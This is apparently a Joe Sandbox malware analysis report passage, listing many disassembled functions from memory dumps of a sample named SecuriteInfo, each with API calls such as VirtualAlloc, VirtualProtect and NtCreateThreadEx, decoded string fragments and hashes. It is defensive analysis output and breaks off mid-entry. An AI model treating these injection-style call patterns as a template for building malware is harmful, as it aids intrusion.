                                                                          • Opcode Fuzzy Hash: f053897cc00dc23acf1833c6ee7bedaf0517b80750cbcdc13bc3f757622fb72c
                                                                          • Instruction Fuzzy Hash: 3D42F6A1D086A88EFB218724DC547EA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Function 0082FA69 Relevance: 53.1, APIs: 2, Strings: 28, Instructions: 641libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: b8573251eafd9ab0668fdc78b9b30b4750b498fe1d3181a55ed2b0d87cd372ef
                                                                          • Instruction ID: 47d3e6198fa9c15b35885a876343ff3ccace46f594134fec744c3728c597df3d
                                                                          • Opcode Fuzzy Hash: b8573251eafd9ab0668fdc78b9b30b4750b498fe1d3181a55ed2b0d87cd372ef
                                                                          • Instruction Fuzzy Hash: 2742F4A1D086A88FFB218724DC547AA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Function 0082FA94 Relevance: 53.1, APIs: 2, Strings: 28, Instructions: 626libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 9631706f8314a25b86158f5b5e2e0399e21dd50341d698a91ff97565c4b3fc70
                                                                          • Instruction ID: f241ce9bf2eb8ffb5534f65eb2bb9a2142fd073167ad240755595c09499158c9
                                                                          • Opcode Fuzzy Hash: 9631706f8314a25b86158f5b5e2e0399e21dd50341d698a91ff97565c4b3fc70
                                                                          • Instruction Fuzzy Hash: 5942E5A1D086A88FFB218724DC547AA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Function 0082FAA5 Relevance: 53.1, APIs: 2, Strings: 28, Instructions: 623libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 7aa7afe0b7a8f4c5f14f78ae825382bdca5e618e18ffbbbd996cdec3db2466a2
                                                                          • Instruction ID: 1184a6cdca346784fcfe48383557e83afa36509adf2896f2d2ba1df68968b4c4
                                                                          • Opcode Fuzzy Hash: 7aa7afe0b7a8f4c5f14f78ae825382bdca5e618e18ffbbbd996cdec3db2466a2
                                                                          • Instruction Fuzzy Hash: E242E5A1D086A88FFB218724DC547AA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Function 0087A9F1 Relevance: 49.6, APIs: 2, Strings: 26, Instructions: 645COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: H6N_$L$L$L$L$W$W$_R$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 0-2538332832
                                                                          • Opcode ID: 0faffd26a090a5b56aed7603f84964732a0a4ee6bd1e4268d06e9c1aac84eced
                                                                          • Instruction ID: 2b97e854133956e3592967f611684a35ca3ec27fd9dab5894f23660aa50d8f9d
                                                                          • Opcode Fuzzy Hash: 0faffd26a090a5b56aed7603f84964732a0a4ee6bd1e4268d06e9c1aac84eced
                                                                          • Instruction Fuzzy Hash: B342B0B1D082A88AEB25CB14DC84BEABB75FF95304F1480E9D44D97285D3799FC58F12
                                                                          Function 00833315 Relevance: 44.0, APIs: 2, Strings: 27, Instructions: 508COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$L$Q$V$W$W$a$a$a$a$b$b$d$d$i$i$j@h$o$o$r$r$r$r$y$y
                                                                          • API String ID: 4275171209-303957544
                                                                          • Opcode ID: 901999c298bc38dfc5e2ec8f20e29d3289192b1aa63413ef46f6f17527206ee0
                                                                          • Instruction ID: a9bc510522347fff6a3a0882921c6818534a48ec5f0f12a0e14ac9c1d0e8b703
                                                                          • Opcode Fuzzy Hash: 901999c298bc38dfc5e2ec8f20e29d3289192b1aa63413ef46f6f17527206ee0
                                                                          • Instruction Fuzzy Hash: 9812E2A1D082A89BEB20CB24DC44BAABB75FF95304F1480F9D44DA7281D67A5FC5CF52
                                                                          Function 008330B1 Relevance: 43.9, APIs: 2, Strings: 27, Instructions: 420COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$L$Q$V$W$W$a$a$a$a$b$b$d$d$i$i$j@h$o$o$r$r$r$r$y$y
                                                                          • API String ID: 4275171209-303957544
                                                                          • Opcode ID: 8a9747a18129eec8f4e6abb0e14d739c6c901f5f98f29740fcff3b211e1c916d
                                                                          • Instruction ID: 3bb6cfb2af9ef16f4bd146992d781ed991614edc28f9e549d91869d597eb02a4
                                                                          • Opcode Fuzzy Hash: 8a9747a18129eec8f4e6abb0e14d739c6c901f5f98f29740fcff3b211e1c916d
                                                                          • Instruction Fuzzy Hash: 0602F3A1D082A88BFB218B24DC44BAA7B75FF95314F0480F9D44DA7281D6BA5FC5CF52
                                                                          Function 008332B5 Relevance: 43.9, APIs: 2, Strings: 27, Instructions: 412COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$L$Q$V$W$W$a$a$a$a$b$b$d$d$i$i$j@h$o$o$r$r$r$r$y$y
                                                                          • API String ID: 4275171209-303957544
                                                                          • Opcode ID: b713ed33a24c6ca816ce9c414c6b955ec63d275ef1d6bd9d4304fdfbbd282239
                                                                          • Instruction ID: 815a765e1f763aa792e5782b0b3c6ccb2516fb19a47b81935f6a530ab7b7a6d5
                                                                          • Opcode Fuzzy Hash: b713ed33a24c6ca816ce9c414c6b955ec63d275ef1d6bd9d4304fdfbbd282239
                                                                          • Instruction Fuzzy Hash: F8F103A1D082A88BF7218B24DC44BAABB75FF95314F0480F9D44DA7281D6BA5FC5CF52
                                                                          Function 00833336 Relevance: 43.9, APIs: 2, Strings: 27, Instructions: 407COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$L$Q$V$W$W$a$a$a$a$b$b$d$d$i$i$j@h$o$o$r$r$r$r$y$y
                                                                          • API String ID: 4275171209-303957544
                                                                          • Opcode ID: 0131136299ab2700db49823651ac1b5e7143e570323e4b9e835082648a1d4fb3
                                                                          • Instruction ID: 9bdfcfe6350df05d8240b64dabea767584e55417816df64a011eb89fd9ee2675
                                                                          • Opcode Fuzzy Hash: 0131136299ab2700db49823651ac1b5e7143e570323e4b9e835082648a1d4fb3
                                                                          • Instruction Fuzzy Hash: A0F1E2A1D082A88BF7218B24DC44BAABB75FF95314F0480F9D44DA7281D6BA5FC5CF52
                                                                          Function 00879B09 Relevance: 31.9, Strings: 25, Instructions: 675COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$L$L$W$W$_R$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 0-1115071425
                                                                          • Opcode ID: 975285dc871bd54dd34cefa1ed52bb1a8dd21f5e536f0d55c12267f8968ad2d6
                                                                          • Instruction ID: 24f5eb0fefe3eab5da588501ded5100bf7c3dc757d19a62257277698c70fee81
                                                                          • Opcode Fuzzy Hash: 975285dc871bd54dd34cefa1ed52bb1a8dd21f5e536f0d55c12267f8968ad2d6
                                                                          • Instruction Fuzzy Hash: 6D4237B1D082A88AE7248B24DC847EA7B75FF91304F1480FAD54DA7285D2799FC5CF62
                                                                          Function 008799E4 Relevance: 31.8, Strings: 25, Instructions: 565COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$L$L$W$W$_R$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 0-1115071425
                                                                          • Opcode ID: 904966624a5a3979faa50c337561ede41efa138299baf8ec7f07dd7bc8828456
                                                                          • Instruction ID: b94246b5a4ef13b3c6a0a1140ca98788156709c565d0e2a8b8a3c1898da5752c
                                                                          • Opcode Fuzzy Hash: 904966624a5a3979faa50c337561ede41efa138299baf8ec7f07dd7bc8828456
                                                                          • Instruction Fuzzy Hash: 5A2214B1D092988AEB248B24DC487EA7B75FF91304F0480F9D54DA7285D2B99FC5CF62
                                                                          Function 00859AF2 Relevance: 31.7, Strings: 25, Instructions: 497COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$L$L$W$W$_R$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 0-1115071425
                                                                          • Opcode ID: dcf307e8b3009111cb01943d198f8515c68b5679d0f72ceb129436566c9753b8
                                                                          • Instruction ID: 97bf3c8ea94c723acad0d2bfdea060b5f28cf47cdc9bf479bea02fda60af306c
                                                                          • Opcode Fuzzy Hash: dcf307e8b3009111cb01943d198f8515c68b5679d0f72ceb129436566c9753b8
                                                                          • Instruction Fuzzy Hash: D41227B1D082988AEB248B24DC487EA7B75FF91304F0440F9D48DA7285D2B98FD5CF62
                                                                          Function 004BAB04 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 462memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,004BC769,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004BAB0B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: 2$2$E$P$c$e$e$e$i$o$p$r$s$s$t$x
                                                                          • API String ID: 544645111-3929738072
                                                                          • Opcode ID: 46bf316bc81deef2bec5f660764c07926ac3fb36aac3e29836616a3b585d7c81
                                                                          • Instruction ID: 4ee755ca57bb90c40dc99aa4956105e2e8bdedf706faa522e54f6aa31eb2e4ab
                                                                          • Opcode Fuzzy Hash: 46bf316bc81deef2bec5f660764c07926ac3fb36aac3e29836616a3b585d7c81
                                                                          • Instruction Fuzzy Hash: 400203B1D042589BF7208A24DC44BEB7BB9EB81314F14C0FAD84D56681DA7D5EC68F63
                                                                          Function 00833793 Relevance: 25.9, APIs: 2, Strings: 15, Instructions: 410COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: e4fd205be8be518ff8ee15a7eefd05c82a08f3a119519d0578a1bc429abdc2cd
                                                                          • Instruction ID: 2b646a28190f0e88c6315b3b767d61d8d4530dd0d8348b8de1496978f3085d16
                                                                          • Opcode Fuzzy Hash: e4fd205be8be518ff8ee15a7eefd05c82a08f3a119519d0578a1bc429abdc2cd
                                                                          • Instruction Fuzzy Hash: 36F1D1A2D042589BFB208B24DC45BAA7779FF95314F1480FAD40DA7680D6BD6FC18F52
                                                                          Function 00833DCD Relevance: 25.9, APIs: 2, Strings: 15, Instructions: 377COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$N;HA$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2812570011
                                                                          • Opcode ID: 77b70b027d2e5bcf2eb44bb76ab8f9f72e0936e6287f72f425d9124e0481c80a
                                                                          • Instruction ID: 5aecc4e88a6fcfd24281f7a5356008496e287d6f9ea95ecd9c215493501c34da
                                                                          • Opcode Fuzzy Hash: 77b70b027d2e5bcf2eb44bb76ab8f9f72e0936e6287f72f425d9124e0481c80a
                                                                          • Instruction Fuzzy Hash: FDE1E0B1E042689BEB24CB14DC45BAAB779FB94310F1440FAD50DA7280D6B96FC1CF52
                                                                          Function 0083366E Relevance: 25.8, APIs: 2, Strings: 15, Instructions: 342COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: b6c5779366b63110c547fe85047f3b9c9e7b0ac0fd8f116d81ea962163d12dc1
                                                                          • Instruction ID: b35c2b8e7516102df2eee5541017beb1a00c37ce0d949c6fdacae90ee5dc8e5c
                                                                          • Opcode Fuzzy Hash: b6c5779366b63110c547fe85047f3b9c9e7b0ac0fd8f116d81ea962163d12dc1
                                                                          • Instruction Fuzzy Hash: BDD1F4A1D042A89BFB20CB24DC45BAA7779FF95314F1440F9D40DA6680D67D6FC18F52
                                                                          Function 00833680 Relevance: 25.8, APIs: 2, Strings: 15, Instructions: 338COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: 4506dfedc251115934a421da24aed6761f0a5348bf8de22fb9c5a414617faf87
                                                                          • Instruction ID: f4680cc77d20d21b38a87656a03710198ff3855f3524410e455b6b33184f5e7a
                                                                          • Opcode Fuzzy Hash: 4506dfedc251115934a421da24aed6761f0a5348bf8de22fb9c5a414617faf87
                                                                          • Instruction Fuzzy Hash: 7AD104A1E046A89BFB20CB24DC45BAA7779FF95314F1480FAD40DA6280D67D6FC18F52
                                                                          Function 008336DA Relevance: 25.8, APIs: 2, Strings: 15, Instructions: 329COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: b4098611df7d40e456501333243ae0d6b67005715ee0c6ed9de95685127fe54a
                                                                          • Instruction ID: ae1f8f97346e9d627921934ed316cae316f1c3a00e7fe3427e786c171c6bd342
                                                                          • Opcode Fuzzy Hash: b4098611df7d40e456501333243ae0d6b67005715ee0c6ed9de95685127fe54a
                                                                          • Instruction Fuzzy Hash: CBD103A1E046A89BF720CB24DC45BAA7779FF95314F1440F9D40DA6280D6BD6FC18F52
                                                                          Function 008334C9 Relevance: 25.8, APIs: 2, Strings: 15, Instructions: 324COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: a92a02a20f34535ac0b9458b5580892397ee49375072ef4d9ed3ebb8cf4e43e5
                                                                          • Instruction ID: 0be4551ec12f62a5a7bee768855fd51bf07dfb983ee621ea5ff9249d08d3f89b
                                                                          • Opcode Fuzzy Hash: a92a02a20f34535ac0b9458b5580892397ee49375072ef4d9ed3ebb8cf4e43e5
                                                                          • Instruction Fuzzy Hash: ABC113A1E042A89BF7208B24DC45BAA7B78FF95314F1440FAD44DA7281D6BD6FC18F52
                                                                          Function 00833553 Relevance: 25.8, APIs: 2, Strings: 15, Instructions: 306COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$V$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2951825817
                                                                          • Opcode ID: f66378c8c1bab8c23f2cbafc80a61c37bfe3a0743ed3e12b9a11ba5ef97f6dff
                                                                          • Instruction ID: 3ede47c4daca4c174f251cb6f951c10e4b52f3d3377414568481354136c9c030
                                                                          • Opcode Fuzzy Hash: f66378c8c1bab8c23f2cbafc80a61c37bfe3a0743ed3e12b9a11ba5ef97f6dff
                                                                          • Instruction Fuzzy Hash: 57C1D2A1E042A89BE720CB24DC45BAA7779FF95314F1440F9D40DA6680D6BD6FC18F52
                                                                          Function 00833C0D Relevance: 25.8, APIs: 2, Strings: 15, Instructions: 279COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$KCXR$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-2296760660
                                                                          • Opcode ID: 0786e39fd52c5280e6206bbf2964671085dabe6894453df27079ef6ead1b60f5
                                                                          • Instruction ID: 356f97270c43eebdb8cb0e68d0ebd66fe8a27e15af51f212f6e625981105364f
                                                                          • Opcode Fuzzy Hash: 0786e39fd52c5280e6206bbf2964671085dabe6894453df27079ef6ead1b60f5
                                                                          • Instruction Fuzzy Hash: 0CB1F2A1E042A89BF720CA24DC45BAA7779FF95314F1480F9D40DA6680D6BE6FC18F52
                                                                          Function 00833816 Relevance: 25.8, APIs: 2, Strings: 15, Instructions: 277COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: $FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-3207822970
                                                                          • Opcode ID: d0ceb7d3a4860189c440c0ac9990602fa27c8e6078c0d3dda129272152813d54
                                                                          • Instruction ID: 7f19f4de077ca823d5d8aa5066fb3dc3b4f7098626c7e932231bfbcde182956f
                                                                          • Opcode Fuzzy Hash: d0ceb7d3a4860189c440c0ac9990602fa27c8e6078c0d3dda129272152813d54
                                                                          • Instruction Fuzzy Hash: C7B1E3A1E042989BF720CA24DC45BAA7779FF95314F1480FAD40DA7680D6BE6FC18F52
                                                                          Function 0087C46D Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 366COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: 5720aa76402b097983f00f7776dee3d243e8f7c62f2b6dc4b7490749cbf14a4d
                                                                          • Instruction ID: dec70529d5ca949433a551e6486499262b2ec62759dd31ec6c18662da57bfb33
                                                                          • Opcode Fuzzy Hash: 5720aa76402b097983f00f7776dee3d243e8f7c62f2b6dc4b7490749cbf14a4d
                                                                          • Instruction Fuzzy Hash: 90E114B1D082A88EE7208B24DC54BEA7B75FF51304F1480FED44DA7281D6B98FC58B62
                                                                          Function 0087C4CF Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 346nativethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087D548
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 2422867632-3193107297
                                                                          • Opcode ID: 216595e9e6264851bda0cb1ed9d7ebd8371a81610e82984d86ecee2a85b7d4f9
                                                                          • Instruction ID: 0f4101d71a225c66d428c0c9545ce51cbf574130a591cdc785ac15dc90e8bd63
                                                                          • Opcode Fuzzy Hash: 216595e9e6264851bda0cb1ed9d7ebd8371a81610e82984d86ecee2a85b7d4f9
                                                                          • Instruction Fuzzy Hash: 07D116B1D086988AF7208A14DC44BEABB79FF90314F1481FAD44D97285D2BD8FC58B61
                                                                          Function 0087C37E Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 344COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$W$_R$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 0-3193107297
                                                                          • Opcode ID: 03522cc837e419f46a705e1bd93ac61cffe061b19b72482ebb148e0310098a77
                                                                          • Instruction ID: 823eacc9998b810df6b5d6165e9276e1dec01463aec8ee0b6214ecb8906f1ec6
                                                                          • Opcode Fuzzy Hash: 03522cc837e419f46a705e1bd93ac61cffe061b19b72482ebb148e0310098a77
                                                                          • Instruction Fuzzy Hash: 9FD105B1D086A88AE7248B24DC547EABB75FF51304F1480FED44DA7285D6B98FC58B22
                                                                          Function 00833F27 Relevance: 24.4, APIs: 2, Strings: 14, Instructions: 439memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?), ref: 0083438B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                                                          • API String ID: 4275171209-953603593
                                                                          • Opcode ID: f23490529e395c21c5d6f4283c2697872bd6c195836e5fbf7c330cfe1368840b
                                                                          • Instruction ID: a06027bad91f16505d3c270e83ee6211eaef385099c2ec7de827a4dc44f412ae
                                                                          • Opcode Fuzzy Hash: f23490529e395c21c5d6f4283c2697872bd6c195836e5fbf7c330cfe1368840b
                                                                          • Instruction Fuzzy Hash: 4902E1B1E042689BEB24CB14DC45BEA7779EB95310F1480FAD90DA7280D6795FC1CF92
                                                                          Function 00833E8E Relevance: 24.4, APIs: 2, Strings: 14, Instructions: 403COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
